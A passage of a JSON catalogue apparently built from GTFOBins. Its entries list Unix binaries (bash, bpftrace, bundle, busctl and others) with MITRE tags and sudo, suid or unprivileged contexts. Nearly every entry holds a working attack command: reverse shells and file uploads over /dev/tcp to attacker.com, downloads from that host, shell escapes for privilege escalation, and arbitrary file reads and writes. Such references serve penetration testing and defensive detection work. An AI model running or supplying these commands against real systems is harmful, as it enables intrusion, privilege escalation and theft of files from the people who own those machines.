\"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"bash -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -p -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"bash -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bash -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bash -p -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bash -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"bash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"bash -p -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"bash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:library-load:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"bash -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:library-load:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"bash -p -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:library-load:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"bash -c 'enable -f /path/to/lib.so x'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:reverse-shell:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:reverse-shell:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"bash -p -c 'exec bash -p -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:reverse-shell:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:shell:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:shell:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bash -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:shell:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"bash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -p -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"bash -c 'echo -e \"POST / HTTP/0.9\\n\\n$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -p -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:upload:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"bash -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bashbug:inherit:0:sudo","toolId":"gtfo:bashbug","toolName":"bashbug","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"bashbug","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bashbug/"]},{"id":"gtfo:bashbug:inherit:0:unprivileged","toolId":"gtfo:bashbug","toolName":"bashbug","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"bashbug","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bashbug/"]},{"id":"gtfo:batcat:inherit:0:sudo","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/batcat/"]},{"id":"gtfo:batcat:inherit:0:suid","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/batcat/"]},{"id":"gtfo:batcat:inherit:0:unprivileged","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/batcat/"]},{"id":"gtfo:bbot:file-read:0:sudo","toolId":"gtfo:bbot","toolName":"bbot","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bbot -d -cy /path/to/input-file","description":"The file is displayed in the debug log.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bbot/"]},{"id":"gtfo:bbot:file-read:0:unprivileged","toolId":"gtfo:bbot","toolName":"bbot","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bbot -d -cy /path/to/input-file","description":"The file is displayed in the debug log.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bbot/"]},{"id":"gtfo:bc:file-read:0:sudo","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bc/"]},{"id":"gtfo:bc:file-read:0:suid","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bc/"]},{"id":"gtfo:bc:file-read:0:unprivileged","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bc/"]},{"id":"gtfo:bconsole:file-read:0:sudo","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:file-read:0:suid","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:file-read:0:unprivileged","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:shell:0:sudo","toolId":"gtfo:bconsole","toolName":"bconsole","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bconsole\n@exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bconsole:shell:0:unprivileged","toolId":"gtfo:bconsole","toolName":"bconsole","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"bconsole\n@exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bconsole/"]},{"id":"gtfo:bee:inherit:0:sudo","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bee/"]},{"id":"gtfo:bee:inherit:0:suid","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bee/"]},{"id":"gtfo:bee:inherit:0:unprivileged","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bee/"]},{"id":"gtfo:borg:shell:0:sudo","toolId":"gtfo:borg","toolName":"borg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"borg extract @:/::: --rsh \"/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/borg/"]},{"id":"gtfo:borg:shell:0:unprivileged","toolId":"gtfo:borg","toolName":"borg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"borg extract @:/::: --rsh \"/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/borg/"]},{"id":"gtfo:bpftrace:shell:0:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bpftrace --unsafe -e 'BEGIN {system(\"/bin/sh 1<&0\");exit()}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"]},{"id":"gtfo:bpftrace:shell:1:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'BEGIN {system(\"/bin/sh 1<&0\");exit()}' >/path/to/temp-file\nbpftrace --unsafe /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"]},{"id":"gtfo:bpftrace:shell:2:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bpftrace -c /bin/sh -e 'END {exit()}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"]},{"id":"gtfo:bridge:file-read:0:sudo","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bridge/"]},{"id":"gtfo:bridge:file-read:0:suid","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bridge/"]},{"id":"gtfo:bridge:file-read:0:unprivileged","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bridge/"]},{"id":"gtfo:bundle:inherit:0:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"bundle help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:inherit:0:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"bundle help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:inherit:1:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"touch Gemfile\nbundle console","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:inherit:1:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"touch Gemfile\nbundle console","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:0:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"BUNDLE_GEMFILE=x bundle exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:0:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"BUNDLE_GEMFILE=x bundle exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:1:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"touch Gemfile\nbundle exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:1:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"touch Gemfile\nbundle exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:2:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'system(\"/bin/sh\")' >Gemfile\nbundle install","description":"This might run the shell twice, one after the other.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:bundle:shell:2:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'system(\"/bin/sh\")' >Gemfile\nbundle install","description":"This might run the shell twice, one after the other.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"]},{"id":"gtfo:busctl:inherit:0:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:inherit:0:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:inherit:0:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:0:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 